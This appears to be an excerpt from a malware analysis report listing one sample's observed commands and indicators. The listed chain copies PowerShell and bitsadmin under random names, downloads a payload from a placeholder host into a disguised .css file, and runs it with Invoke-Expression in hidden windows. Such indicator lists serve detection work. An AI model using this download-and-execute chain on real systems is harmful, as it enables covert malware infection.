Technical Information
- '%ALLUSERSPROFILE%\lrncnaoin.exe' /transfer QhRdBa /download https://example.com %APPDATA%\uk.css
- '%ALLUSERSPROFILE%\zhljiagc.exe' -c &{$PK=gc %APPDATA%\uk.css| Out-String; Invoke-Expression $PK }
- %ALLUSERSPROFILE%\zhljiagc.exe
- %ALLUSERSPROFILE%\lrncnaoin.exe
- %APPDATA%\bitb1d1.tmp
- from %APPDATA%\bitb1d1.tmp to %APPDATA%\uk.css
- 'ex##ple.com':443
- DNS ASK ex##ple.com
- '<SYSTEM32>\cmd.exe' /c cmd /c copy /Z %WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe %ALLUSERSPROFILE%\zhLJiagc.exe' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c copy /Y /Z %WINDIR%\SysWOW64\bi*.exe %ALLUSERSPROFILE%\lRnCNAO*.exe' (with hidden window)
- '%ALLUSERSPROFILE%\lrncnaoin.exe' /transfer QhRdBa /download https://example.com %APPDATA%\uk.css' (with hidden window)
- '%ALLUSERSPROFILE%\zhljiagc.exe' -c &{$PK=gc %APPDATA%\uk.css| Out-String; Invoke-Expression $PK }' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c cmd /c copy /Z %WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe %ALLUSERSPROFILE%\zhLJiagc.exe
- '<SYSTEM32>\cmd.exe' /c copy /Z %WINDIR%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe %ALLUSERSPROFILE%\zhLJiagc.exe
- '<SYSTEM32>\cmd.exe' /c copy /Y /Z %WINDIR%\SysWOW64\bi*.exe %ALLUSERSPROFILE%\lRnCNAO*.exe